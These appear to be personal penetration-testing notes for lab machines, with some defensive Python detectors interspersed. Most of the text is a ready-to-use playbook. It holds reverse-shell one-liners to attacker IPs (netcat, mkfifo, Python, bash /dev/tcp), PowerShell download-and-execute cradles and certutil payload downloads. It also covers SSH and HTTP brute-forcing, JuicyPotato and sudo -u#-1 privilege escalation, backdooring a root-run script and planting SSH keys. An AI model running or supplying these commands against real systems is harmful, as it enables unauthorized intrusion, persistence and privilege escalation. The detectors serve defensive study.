master_notes.txt
==Classic==
Python stabilize shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
==Enumeration==
Big Gobuster scan:
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -x php,html,config
A good CEWL:
cewl -w output.txt -d 10 -m 1 http://10.10.10.191/
SMB enumeration:
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
smbclient //10.11.1.146/SusieShare -U "%"
SusieShare is the name of the file share
-U "%" sends an empty username and an empty password (null session login attempt)
SMB hydra:
hydra -L user.txt -P pass.txt <IP> smb
Tomcat:
Default admin dashboard is located at http://<IP>:<PORT>/manager/html (default creds admin:admin)
host-manager admin dashboard is at http://<IP>:<PORT>/host-manager/html
bruteforce: hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
if you can only access host-manager, get a shell with: https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00
DNS Stuff:
To use nslookup (interactive mode):
nslookup
SERVER <IP>        (point nslookup at the target's own name server)
127.0.0.1          (reverse lookup, just checks the server answers)
<IP again>         (reverse lookup of the target IP; the PTR record is its hostname)
this should give you something to work with. ex: ns1.cronos.htb
the DOMAIN NAME here is cronos.htb
Use nslookup to identify the domain name, then try a zone transfer / ANY query to find subdomains:
dig axfr @10.10.10.13 cronos.htb
dig ANY cronos.htb @10.10.10.13
where cronos.htb is the domain portion of the name and 10.10.10.13 is the target's name server
subdomain bruteforce:
gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
where cronos.htb is the domain name
ex results: ns1.cronos.htb, www.cronos.htb, admin.cronos.htb
==Foothold==
Good bruteforce ssh:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -e nsr -s 22 ssh://IP
nc shell without -e:
mkfifo pipe; nc -nv 10.10.14.90 443 < pipe | /bin/sh 2>pipe >pipe
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.90 443 >/tmp/f
RUN THIS ONE A COUPLE OF TIMES!!!! a plain rm complains when /tmp/f doesn't exist yet (rm -f silences that); if it still misbehaves, run it a few times so the fifo gets created/removed cleanly
URL ENCODE IT IN BURPSUITE TOO
Establish winrm session (port 5985 Windows):
evil-winrm -i <IP> -P <PORT #> -p <password> -u <username>
Impacket-psexec - used to log on to windows box via port 445
can be as easy as:
impacket-psexec <username>@<IP or domain name>
then input password when prompted.
(see secnotes)
HTTP bruteforce w/ hydra:
https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
Python3 reverse shell:
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
same as the python one-liner but invoked with python3
Shell without a forward slash /:
nc 10.10.14.10 4444 -c bash
EvilWinRM
WinRM is on port 5985 - if open, can be used to get shell on Windows boxes with:
evil-winrm -i 10.10.10.203 -u <user> -p <pass>
==Upgrading shells (in tmux w/ zsh):==
in shell terminal:
ctrl-z
stty raw -echo; fg
hit enter x2
<done> (should be back in shell)
in kali term:
stty -a
(get rows and columns)
in shell term:
stty rows # columns # (sets shell to full term)
export TERM=xterm-color (lets you clear)
==Transfer Files==
Certutil:
certutil.exe -urlcache -split -f "http://192.168.119.207:8000/nc.exe" c:\xampp\htdocs\nc.exe
https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/
Transfer with ftp server:
python2 -m pyftpdlib -p 21 -w ##spins up a FTP server in the directory you are located on port 21 and it allows anonymous login access.
python3 -m pyftpdlib -p 21 -w ##spins up a Python 3.X FTP server in the directory you are located on port 21 and it allows anonymous login access.
Transfer via Powershell:
IEX(New-Object Net.WebClient).downloadString('http://<IP>:<PORT>/<file>')
this can be used to create reverse shell (put a nishang PS shell in there)
best one to use is Invoke-PowerShellTcp.ps1 BUT Put this at bottom of that ps1:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 6666
can run this IEX command in a terminal BUT If not already powershell must put: powershell "IEX.....')"
this will EXECUTE after downloading
(New-Object Net.WebClient).DownloadFile('http://<IP>:<PORT>/<file>', 'C:\<path>')
THIS WILL ONLY DOWNLOAD, NOT EXECUTE.
put "powershell '(New....')'" if not in powershell already
or try without the ' ' (before new and at the end) if it doesn't work with the ' '
make sure the file path for destination ACTUALLY exists...
IEX (IWR http://<IP>:<port>/<file> -UseBasicParsing)
another method similar to above but doesn't require the use of quotation marks in case that's an issue!
useful when antivirus AV is an issue!
use this from a webshell because it executes immediately!
IWR http://<IP>:<port>/<file> -OutFile <name>
use this for local! (after getting shell)
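From the blue-team side, the transfer one-liners above (certutil -urlcache, Net.WebClient DownloadString/DownloadFile, IEX + IWR) are exactly the strings worth alerting on in process-creation telemetry. The following is an added example, not part of these notes: a small Python detector run over constructed "user | image | command line" records that I made up to mirror the commands above. The rule names and the record format are my own assumptions, not any real product's.

```python
import re

# Constructed sample process-creation records (made up for this example, not real
# telemetry). Each record is "user | image | command line"; the command lines
# mirror the transfer one-liners listed in the notes above.
SAMPLE_EVENTS = [
    'alice | C:\\Windows\\System32\\certutil.exe | certutil.exe -urlcache -split -f "http://192.168.119.207:8000/nc.exe" c:\\xampp\\htdocs\\nc.exe',
    'svc_web | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell "IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.10:8000/shell.ps1\')"',
    "bob | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell (New-Object Net.WebClient).DownloadFile('http://10.10.14.10:8000/tool.exe', 'C:\\Users\\Public\\tool.exe')",
    "bob | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell IEX (IWR http://10.10.14.10:8000/run.ps1 -UseBasicParsing)",
    "alice | C:\\Windows\\System32\\certutil.exe | certutil.exe -hashfile C:\\Users\\alice\\setup.msi SHA256",
    "carol | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell Get-Process | Sort-Object CPU",
]

# Detection rules (my own names). Each regex targets one of the transfer
# patterns from the notes; case-insensitive because PowerShell is.
RULES = [
    ("certutil_urlcache_download", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("ps_webclient_downloadstring", re.compile(r"Net\.WebClient\b.*\.DownloadString\s*\(", re.I)),
    ("ps_webclient_downloadfile", re.compile(r"Net\.WebClient\b.*\.DownloadFile\s*\(", re.I)),
    ("ps_iex_invoke_webrequest", re.compile(r"\bIEX\b\s*\(\s*(?:IWR|Invoke-WebRequest)\b", re.I)),
]


def parse_event(line):
    # Split at most twice so a "|" inside the command line (a PowerShell
    # pipeline) stays with the command line instead of breaking the record.
    user, image, cmdline = (part.strip() for part in line.split("|", 2))
    return {"user": user, "image": image, "cmdline": cmdline}


def classify(cmdline):
    """Return the names of every rule that matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Run every record through the rules; benign certutil/powershell use
    (hashing a file, listing processes) produces no finding."""
    findings = []
    for line in lines:
        event = parse_event(line)
        hits = classify(event["cmdline"])
        if hits:
            findings.append({"user": event["user"], "rules": hits, "cmdline": event["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['user']:8} {','.join(f['rules']):30} {f['cmdline'][:70]}")
```

The two benign records (certutil -hashfile, Get-Process) are there on purpose: a rule keyed only on the image name would page on every certutil or powershell launch, so the regexes anchor on the download-specific switches and methods instead.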
==PE TIPS:==
Python stabilize shell: see ==Classic== above.
Log into a (My)SQL database with:
mysql -u wpuser -p
input password when prompted
SHOW DATABASES;
the trailing ; is very important
USE wp;                        (wp is the database)
SHOW TABLES;
SHOW COLUMNS FROM wp_users;    (wp_users is the table)
THEN TO GET THE ACTUAL results:
SELECT * FROM wp_users;
capabilities:
getcap -r / 2>/dev/null
use this to check capabilities (like suid but different) and then search google to find out if PE is available. example:
root@cap:/root# getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
was able to use cap_setuid and getcap to PE to root from user nathan on this box.
https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
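The getcap output above is easy to eyeball on one box but not across a fleet. As an added example (not from these notes), here is a Python parser for `getcap -r` output that flags the capabilities which amount to root when attached to an interpreter, such as the cap_setuid on python3.8 shown above. The sample output is constructed for the example, and the high-risk list and interpreter list are my own working assumptions, not an authoritative list. It accepts both the older `path = caps+flags` print style used above and the newer `path caps=flags` style of recent libcap.

```python
import os
import re

# Constructed sample of `getcap -r / 2>/dev/null` output (made up for this example).
# The first line uses the newer libcap print style, the rest the older one shown above.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/sbin/arping = cap_net_raw+ep
/usr/bin/perl = cap_dac_read_search+ep
/usr/bin/gdb = cap_sys_ptrace+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that give root-equivalent power on their own (my own working list,
# not exhaustive). The value is the one-line reason shown in a finding.
HIGH_RISK = {
    "cap_setuid": "can switch to uid 0",
    "cap_setgid": "can switch to gid 0 / any group",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "can read any file (e.g. /etc/shadow)",
    "cap_sys_admin": "catch-all admin capability",
    "cap_sys_ptrace": "can attach to processes running as root",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can take ownership of any file",
    "cap_fowner": "bypasses owner checks (chmod, etc.)",
}

# A capability on an interpreter is scriptable by anyone who can run it,
# which is what made the python3.8 case above a one-liner to root.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "gdb")

OLD_STYLE = re.compile(r"^(\S+)\s*=\s*([a-z0-9_,]+)\+([eip]+)$")  # path = caps+flags
NEW_STYLE = re.compile(r"^(\S+)\s+([a-z0-9_,]+)=([eip]+)$")       # path caps=flags


def parse_getcap(text):
    """Turn getcap -r output into [{path, caps, flags}], skipping lines that
    match neither print style (e.g. stray error text)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        m = OLD_STYLE.match(line) or NEW_STYLE.match(line)
        if not m:
            continue
        path, caps, flags = m.groups()
        entries.append({"path": path, "caps": caps.split(","), "flags": set(flags)})
    return entries


def assess(entries):
    """Keep only entries carrying a high-risk capability and annotate whether
    it is effective (e flag) and whether the binary is an interpreter."""
    findings = []
    for e in entries:
        risky = [c for c in e["caps"] if c in HIGH_RISK]
        if not risky:
            continue
        base = os.path.basename(e["path"])
        findings.append({
            "path": e["path"],
            "risky": risky,
            "effective": "e" in e["flags"],
            "interpreter": any(base.startswith(n) for n in INTERPRETERS),
            "why": "; ".join(HIGH_RISK[c] for c in risky),
        })
    return findings


if __name__ == "__main__":
    for f in assess(parse_getcap(SAMPLE_GETCAP)):
        tag = "INTERPRETER" if f["interpreter"] else "binary"
        print(f"{f['path']:30} {','.join(f['risky']):25} {tag:12} {f['why']}")
```

cap_net_raw on ping and cap_net_bind_service on a helper are normal distro defaults and are deliberately not flagged; the point of the baseline list is to surface the odd cap_setuid on an interpreter rather than to page on every capability.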
Adding ssh keys (if given file write ability)
from kali:
ssh-keygen
name file
cat <name>.pub, take everything from (and including) ssh-rsa to the final = (don't copy root@kali)
from victim:
write that into file however you can
file to write to: /root/.ssh/authorized_keys
<or whatever user instead of root>
from kali:
chmod 600 <name> (NOT name.pub)
ssh -i <name> root@<IP>
(or whatever user instead of root)
PE SUID Bit Stuff (gtfobins):
find / -type f -perm /6000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
find / -type f -perm /2000 2>/dev/null
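The three find commands above are a point-in-time list; what a defender actually wants is the difference between today's list and a known-good baseline. As an added example (not from these notes), here is a Python scanner that walks a tree and reports regular files with the setuid/setgid bits, mirroring /4000, /2000 and /6000, plus a baseline diff. The skip list for pseudo-filesystems is my own choice.

```python
import os
import stat


def classify_mode(mode):
    """Name the special bits set in an st_mode, mirroring the find expressions
    above: /4000 = suid, /2000 = sgid, /6000 = either."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return bits


def scan_special_bits(root, skip=("/proc", "/sys", "/dev")):
    """Walk root and return sorted (path, bits, owner_uid) for every regular
    file with the setuid or setgid bit. Pseudo-filesystems are pruned and
    unreadable entries skipped, which is what 2>/dev/null hides in find."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in skip:
            dirnames[:] = []  # prune: do not descend into /proc, /sys, /dev
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = classify_mode(st.st_mode)
            if bits:
                hits.append((path, bits, st.st_uid))
    return sorted(hits)


def unexpected(hits, baseline):
    """Paths with special bits that are not in a known-good baseline set.
    A setuid binary that was not there at install time is the thing to chase."""
    return [path for path, _, _ in hits if path not in baseline]


if __name__ == "__main__":
    # On a real host you would load the baseline from the last known-good scan.
    baseline = set()
    for path, bits, uid in scan_special_bits("/"):
        print(f"{path:40} {','.join(bits):10} uid={uid}")
    print("not in baseline:", unexpected(scan_special_bits("/usr/bin"), baseline))
```

Owner uid is carried along because a setuid file owned by an ordinary user is harmless to root but a setuid root file in a world-writable directory is not; the baseline diff is where the scan earns its keep on a box you administer.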
cctc final notes
Sudo vuln:
versions prior to 1.8.28:
sudo -u#-1 /bin/bash
/bin/bash being the command you have perms to run as anything but root!
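The -u#-1 trick only matters when two things line up: a sudo older than 1.8.28 and a sudoers rule that grants everything except root (the "(ALL, !root)" shape). As an added example (not from these notes), here is a Python check that reads both conditions so you can tell which of your hosts are actually at risk. The sudo --version and sudoers text are constructed samples; the rule parser only understands the simple "user host=(runas) commands" form and is my own simplification, not the full sudoers grammar.

```python
import re

# Constructed sample `sudo --version` outputs (only the first line matters).
SAMPLE_VERSION_OLD = "Sudo version 1.8.27p1\nSudoers policy plugin version 1.8.27p1\n"
SAMPLE_VERSION_NEW = "Sudo version 1.9.9\nSudoers policy plugin version 1.9.9\n"

# Constructed sample sudoers content; the hacker and alice rules use the
# "(ALL, !root)" runas pattern described in the notes above.
SAMPLE_SUDOERS = """\
# constructed sample, not a real sudoers file
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
hacker  ALL=(ALL, !root) /bin/bash
alice   ALL=(ALL, !root) NOPASSWD: /usr/bin/vim
bob     ALL=(www-data) /usr/bin/find
"""

FIXED_IN = (1, 8, 28)  # first version without the -u#-1 behaviour, per the notes


def parse_sudo_version(output):
    """Return (major, minor, patch) from `sudo --version`; a 'p' suffix such as
    1.8.27p1 is ignored because the comparison is against a plain x.y.z."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())


def version_is_affected(output):
    return parse_sudo_version(output) < FIXED_IN


# Simplified rule: user host = (runas_users[:runas_groups]) commands
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")


def exposed_rules(sudoers_text):
    """Rules whose runas user list is ALL minus an exclusion (e.g. ALL, !root).
    The exclusion only holds if sudo resolves the requested uid correctly,
    which is exactly what -u#-1 breaks on old versions."""
    out = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":", 1)[0]  # drop the group part
        users = [u.strip() for u in runas_users.split(",")]
        if "ALL" in users and any(u.startswith("!") for u in users):
            out.append({"who": m.group("who"), "runas": m.group("runas"), "cmds": m.group("cmds")})
    return out


def host_at_risk(version_output, sudoers_text):
    """Both conditions must hold: old sudo and at least one rule with the exclusion."""
    return version_is_affected(version_output) and bool(exposed_rules(sudoers_text))


if __name__ == "__main__":
    for r in exposed_rules(SAMPLE_SUDOERS):
        print(f"{r['who']:8} ({r['runas']}) {r['cmds']}")
    print("at risk (old sudo):", host_at_risk(SAMPLE_VERSION_OLD, SAMPLE_SUDOERS))
    print("at risk (new sudo):", host_at_risk(SAMPLE_VERSION_NEW, SAMPLE_SUDOERS))
```

The fix on the rule side is to list the allowed runas users explicitly instead of relying on "everything except root"; the version check is there so a patched host with a leftover "!root" rule is reported as hygiene, not as exposure.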
Windows where TIPS
where /R c:\ bash.exe
will search recursively for file named bash.exe in c:\
JuicyPotato
great resource: https://r3dbuck3t.notion.site/Juicy-Potato-37853a8356c64e6da0cedc037e83c8e0
How to use:
Look for the associated privileges. Transfer nc and juicypotato.
C:\tmp>echo C:\tmp\nc.exe -e cmd.exe 10.10.14.10 4444 > shell.bat
Command: C:\tmp>./jp.exe -t * -p C:\tmp\shell.bat -l 1137
if this doesn't work, try some other CLSIDs (see below)
for "COM -> recv failed with error: 10038" or similar error, test CLSIDs and try multiple:
transfer the list that corresponds to your system: https://github.com/ohpe/juicy-potato/tree/master/CLSID
MUST be named CLSID.list on windows victim host
EDIT and transfer test_clsid.bat: https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat (it's already in exploit/potatoes dir tho)
EDIT on kali the name of the juicy potato file you want to use (different depending on what you do) - ex: jp32.exe -z -l !port! -c %%i >> result.log
jp32.exe MUST be the name of the juicy potato .exe that you have on the victim
run test_clsid.bat and wait for it to go through all the CLSIDs. when the port number changes, that means it's a good CLSID. copy down a few
because sometimes even the 'good' ones don't work. then run. ex:
{B474265E-3EF5-46E8-9FD9-AE034F34FC74} 10000
{C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} 10001 - THIS IS THE GOOD ONE.
then: jp32.exe -t * -p C:\tmp\shell.bat -l 1337 -c {5B99FA76-721C-423C-ADAC-56D03C8A8007}
just a note - jp32.exe will work on a 64 bit system. CLSID stuff might be tough though and necessitate this step^
Groups
adm - can read logs (look for passwords)
Good find commands:
find / -user shaun -ls 2>/dev/null
finds any files owned by 'shaun'
SharpCollection for precompiled .exes
https://github.com/Flangvik/SharpCollection
Shells within scripts (especially if you can write to a directory that contains a python file ran by root or a python library file):
With access to a python file that root runs, add:
import os
import sys
try:
    os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'")
except:
    sys.exit()
another option:
----
import os
import pty
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.7", 443))
os.dup2(s.fileno(), 0)   # dup2 lives in os; the bare dup2() calls would raise NameError
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
s.close()
-----
Read alternate data streams (ADS) from:
cmd: more < file.txt:stream.txt
PS: Get-Content file.txt -stream stream.txt
==PASSWORD CRACKING==
john
zip files:
zip2john 16162020_backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
==etc==
/usr/bin/env: ‘bash\r’: No such file or directory
with this error, use dos2unix on the .sh script (the shebang line has Windows CRLF line endings)